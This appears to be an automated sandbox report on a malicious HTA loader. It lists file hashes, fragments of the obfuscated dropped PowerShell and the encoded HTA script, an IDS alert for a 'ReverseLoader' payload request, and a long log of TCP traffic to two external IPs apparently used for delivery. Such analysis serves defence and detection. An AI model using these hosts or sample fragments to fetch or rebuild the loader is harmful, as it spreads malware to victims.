                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165320
                                                                          Entropy (8bit):3.9154650100951054
                                                                          Encrypted:false
                                                                          SSDEEP:3072:cQKStd/roV5KEwdQKStd/roV5KEwzQKStd/roV5KEwt:hK2d/rY5KBuK2d/rY5KBsK2d/rY5KBt
                                                                          MD5:5BE16D230E88F7D40E09E2E938446071
                                                                          SHA1:668C33BA360AE4E37B8C440DA266F5CFAFCD4750
                                                                          SHA-256:B7390070E99BA85CF154363319100F6D6E201CB6570C90C6FC132F16CB218AE0
                                                                          SHA-512:8EC25D49B3065689B779D1AE5993CA2DF3608DF81648479F138C47CB7B51D92D9DA73B4E39C910EB0EE0D88297BA93B0E2B77B58B1B927F5D9A79AE1AB66E651
                                                                          Malicious:true
                                                                          Preview:..........U.I.K.p.Z.P.R.v.l.e.L.i.m.n.z. .=. .".q.U.i.m.W.f.A.L.a.c.I.C.H.l.g.".....p.b.t.L.W.U.h.L.W.B.U.s.r.p.W. .=. .".k.U.G.i.K.p.x.L.q.P.x.j.C.p.b.".....W.k.h.i.p.Z.l.W.n.h.z.n.p.W.q. .=. .".h.W.a.L.A.c.v.j.U.q.N.k.W.B.J.".....G.G.h.Z.U.K.z.n.A.z.d.b.m.h.l. .=. .".q.o.G.Z.U.W.U.B.i.T.q.K.P.i.i.".....i.v.m.o.d.K.L.B.U.h.W.k.L.i.G. .=. .".k.i.d.p.U.L.u.L.P.U.k.O.W.B.N.".....e.R.B.U.f.W.U.n.g.c.L.i.A.Z.t. .=. .".b.i.G.J.d.Q.K.O.S.J.f.d.f.b.j.".........Z.l.l.B.W.A.W.W.P.R.i.g.c.W.W. .=. .".e.W.c.h.z.G.K.R.p.a.H.i.U.K.L.".....k.m.O.W.j.h.W.z.l.B.L.N.b.T.C. .=. .".W.C.H.S.C.i.K.W.t.U.S.L.W.B.c.".....J.N.Z.l.e.G.A.i.H.W.G.o.z.m.i. .=. .".d.c.O.f.O.L.t.t.t.l.u.r.K.e.L.".........c.W.d.c.P.r.Q.f.I.n.Q.z.f.r.K. .=. .".B.T.G.o.U.q.f.C.o.z.g.t.e.x.k.".....k.i.u.m.u.o.b.h.h.Z.i.c.x.G.b. .=. .".U.W.I.W.p.i.J.u.s.O.m.f.S.c.a.".....b.G.g.m.e.L.k.W.l.A.C.L.R.U.A. .=. .".a.a.Z.t.c.Q.N.W.i.W.b.o.z.m.L.".....C.n.o.W.U.W.h.i.e.L.i.P.u.T.t. .=. .".u.c.a.r.t.a.p.e.l.e.U.A.p.f.W.i.A.C.W.L.k.G.".....s.U.o.

                                                                          Static File Info

                                                                          General

                                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                          Entropy (8bit):2.3056895883292174
                                                                          TrID:
                                                                            File name:greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
                                                                            File size:221'045 bytes
                                                                            MD5:af5174392d590a5b515ab1dcacfc79c6
                                                                            SHA1:28697fe6ef17f0a714e89505495d60e10b40b8f3
                                                                            SHA256:a09dc85606cb624d221defe49d7df873af0064acb6e81d14ba646c1aa38936ee
                                                                            SHA512:c4e2c01a2838631ca96b6c193377e6c4cc319f1a5a4e2cfc34e24411b0acaddcb998953da4522e69ea332f44791514cbd6f58e64665227c890c02bf6f6c913ed
                                                                            SSDEEP:1536:RZ7yZCdWybXhUsBA7MoNfEOOcSj0CdWybXhUJBA7MoNfEOOcSj6yztFuZggxdxp+:Ra
                                                                            TLSH:AE24DB419D240069FBFD9E96ADEDF74F3574221EDACD9D8D4327BA80DCA228F644098C
                                                                            File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520pr

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-28T07:18:04.397158+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.44973023.95.128.21580TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 28, 2024 07:18:03.115390062 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:03.235568047 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:03.235670090 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:03.235958099 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:03.355860949 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397062063 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397157907 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.397172928 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397182941 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397221088 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.397247076 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397258997 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397284031 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.397300959 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.397506952 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397517920 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397528887 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397540092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397550106 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.397566080 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.397591114 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.517149925 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.517232895 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.517237902 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.517292023 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.521332979 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.521394968 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.598535061 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.598614931 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.598655939 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.598701000 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.602718115 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.602770090 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.602787018 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.602829933 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.611150026 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.611210108 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.611253977 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.611299992 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.619523048 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.619574070 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.619635105 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.619682074 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.627949953 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.628005981 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.628037930 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.628078938 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.636332035 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.636419058 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.636451960 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.636496067 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.644790888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.644845009 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.644887924 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.644933939 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.653178930 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.653230906 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.653290987 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.653337002 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.661607981 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.661659002 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.661690950 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.661732912 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.669243097 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.669292927 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.669356108 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.669399023 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.676897049 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.676949978 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.677016020 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.677059889 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.718627930 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.718694925 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.718729019 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.718771935 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.799771070 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.799832106 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.800127029 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.800175905 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.802674055 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.802722931 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.802753925 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.802793980 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.808485985 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.808553934 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.808599949 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.808640957 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.814243078 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.814301968 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.814326048 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.814364910 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.819987059 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.820039988 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.820087910 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.820127010 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.825819969 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.825931072 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.825936079 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.825973034 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.831559896 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.831614971 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.831676006 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.831718922 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.837380886 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.837434053 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.837471008 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.837511063 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.843126059 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.843194962 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.843239069 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.843281984 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.848917007 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.848984003 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.849009991 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.849065065 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.854659081 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.854722023 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.854808092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.854850054 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.858313084 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.858372927 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.858413935 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.858454943 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.862020016 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.862083912 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.862111092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.862150908 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.865619898 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.865679979 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.865717888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.865758896 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.869282007 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.869330883 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.869394064 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.869436026 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.872946978 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.873003006 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.873023987 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.873064041 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.876602888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.876672983 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.876741886 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.876785994 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.880228043 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.880278111 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.880331993 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.880376101 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.883900881 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.883946896 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.883975983 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.884017944 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.887567043 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.887620926 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.887670994 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.887712002 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:04.891168118 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:04.891221046 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.000981092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.001059055 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.001123905 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.001173019 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.002779007 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.002820969 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.002880096 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.002923965 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.006438971 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.006493092 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.006551027 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.006594896 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.010097980 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.010159969 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.010205984 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.010246038 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.013753891 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.013838053 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.013921022 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.017412901 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.017472029 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.017504930 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.017544031 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.021073103 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.021123886 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.021195889 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.021238089 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.024723053 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.024780989 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.024816990 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.024854898 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.028378963 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.028430939 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.028464079 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.028505087 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.032023907 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.032075882 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.032135963 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.032182932 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.035705090 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.035756111 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.035818100 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.035860062 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.039383888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.039433956 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.039515972 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.039561033 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.043006897 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.043054104 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.043118954 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.043164015 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.046664000 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.046713114 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.046760082 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.046802998 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.050327063 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.050378084 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.050409079 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.050448895 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.053759098 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.053807020 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.053872108 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.053914070 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.057183981 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.057250023 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.057261944 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.057302952 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.060615063 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.060672045 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.060709953 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.060749054 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.064049006 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.064097881 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.064132929 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.064172029 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.067486048 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.067538977 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.067567110 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.067605019 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.070949078 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.070998907 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.071041107 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.071086884 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.074377060 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.074419975 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.074487925 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.074527979 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.077822924 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.077866077 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.077900887 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.077936888 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.081250906 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.081300020 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.081331015 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.081373930 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.084688902 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.084734917 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.084799051 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.084837914 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.088105917 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.088156939 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.088229895 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.088277102 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.091595888 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.091660023 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.091665030 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.091706991 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.094969988 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.095022917 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.095093966 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.095136881 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.098431110 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.098478079 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.098534107 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.098575115 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:05.101836920 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:05.101885080 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:09.424225092 CET804973023.95.128.215192.168.2.4
                                                                            Nov 28, 2024 07:18:09.424293041 CET4973080192.168.2.423.95.128.215
                                                                            Nov 28, 2024 07:18:10.173002958 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.173054934 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:10.173125029 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.183624983 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:10.183640957 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.075308084 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.075393915 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.078290939 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.078303099 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.078636885 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.106770039 CET49731443192.168.2.4193.30.119.205
                                                                            Nov 28, 2024 07:18:12.151330948 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.531342030 CET44349731193.30.119.205192.168.2.4
                                                                            Nov 28, 2024 07:18:12.531596899 CET44349731193.30.119.205192.168.2.4
